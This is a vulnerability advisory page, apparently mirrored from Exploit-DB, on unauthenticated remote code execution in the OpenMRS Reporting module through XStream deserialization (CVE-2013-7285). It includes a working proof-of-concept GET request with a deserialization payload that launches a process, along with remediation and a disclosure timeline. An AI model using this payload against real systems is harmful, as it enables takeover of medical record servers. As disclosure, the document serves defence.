header-logo
Suggest Exploit
vendor:
OpenMRS
by:
Brian D. Hysell
9,8
CVSS
CRITICAL
Remote Code Execution
502
CWE
Product Name: OpenMRS
Affected Version From: OpenMRS Standalone 2.3 and OpenMRS Platform 1.11.4 WAR with Reporting 0.9.7 and Appointment Scheduling UI 1.0.3
Affected Version To: Other versions and configurations containing these modules
Patch Exists: YES
Related CWE: CVE-2013-7285
CPE: a:openmrs:openmrs
Metasploit: https://www.rapid7.com/db/vulnerabilities/jenkins-2014-02-14_cve-2013-7285/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2013-7285/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2014-0389/
Other Scripts: N/A
Tags: cve,cve2013,xstream,deserialization,rce,oast
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Nuclei References: https://x-stream.github.io/CVE-2013-7285.htmlhttps://www.mail-archive.com/user@xstream.codehaus.org/msg00607.htmlhttps://www.mail-archive.com/user@xstream.codehaus.org/msg00604.htmlhttps://nvd.nist.gov/vuln/detail/cve-2013-7285https://blog.csdn.net/Xxy605/article/details/126297121
Nuclei Metadata: {'max-request': 1, 'vendor': 'xstream_project', 'product': 'xstream'}
Platforms Tested: Web
2013

Unauthenticated remote code execution in OpenMRS

Xstream API before 1.4.6 and 1.4.10 is susceptible to remote code execution. If the security framework has not been initialized, an attacker can run arbitrary shell commands by manipulating the processed input stream when unmarshaling XML or any supported format. This can allow an attacker to obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.

Mitigation:

Upgrade to the latest version of OpenMRS Reporting Module and Appointment Scheduling UI Module.
Source

Exploit-DB raw data:

Title: Unauthenticated remote code execution in OpenMRS
Product: OpenMRS
Vendor: OpenMRS Inc.
Tested versions: See summary
Status: Fixed by vendor
Reported by: Brian D. Hysell

Product description:

OpenMRS is "the world's leading open source enterprise electronic
medical record system platform."

Vulnerability summary:

The OpenMRS Reporting Module 0.9.7 passes untrusted XML input to a
version of the XStream library vulnerable to CVE-2013-7285, making it
vulnerable to remote code execution. If the Appointment Scheduling UI
Module 1.0.3 is also installed, this RCE is accessible to
unauthenticated attackers. OpenMRS Standalone 2.3 and OpenMRS Platform
1.11.4 WAR with Reporting 0.9.7 and Appointment Scheduling UI 1.0.3
installed were confirmed to be vulnerable; other versions and
configurations containing these modules are likely to be vulnerable as
well (see "Remediation").

Details:

In the Reporting module, the method saveSerializedDefinition (mapped
to module/reporting/definition/saveSerializedDefinition) in
InvalidSerializedDefinitionController can be accessed by an
unauthenticated user.

The attacker must provide a valid UUID for a definition present in
OpenMRS or a NullPointerException will be thrown before the remote
code execution can take place. However, upon initialization the
Appointments Scheduling UI module inserts a definition with a constant
UUID hard-coded into AppointmentSchedulingUIConstants
(c1bf0730-e69e-11e3-ac10-0800200c9a66).

Proof of concept:

GET /openmrs-standalone/module/reporting/definition/saveSerializedDefinition.form?type=org.openmrs.OpenmrsObject&serializationClass=org.openmrs.module.serialization.xstream.XStreamSerializer&serializedData=<dynamic-proxy><interface>org.openmrs.OpenmrsObject</interface><handler%20class%3d"java.beans.EventHandler"><target%20class%3d"java.lang.ProcessBuilder"><command><string>calc.exe</string></command></target><action>start</action></handler></dynamic-proxy>&uuid=c1bf0730-e69e-11e3-ac10-0800200c9a66&name=test&subtype=org.openmrs.OpenmrsObject

Remediation:

The vendor has addressed this issue in OpenMRS Standalone 2.3.1,
OpenMRS Reference Application 2.3.1, and OpenMRS Platform 1.11.5,
1.10.3, and 1.9.10.

Timeline:

Vendor contacted: November 2, 2015
Vendor replied: November 3
CVE requested: November 14 (no response)
Patch released: December 2
Announced: January 6, 2016

Navigation

Suggest Exploit

Services By CQR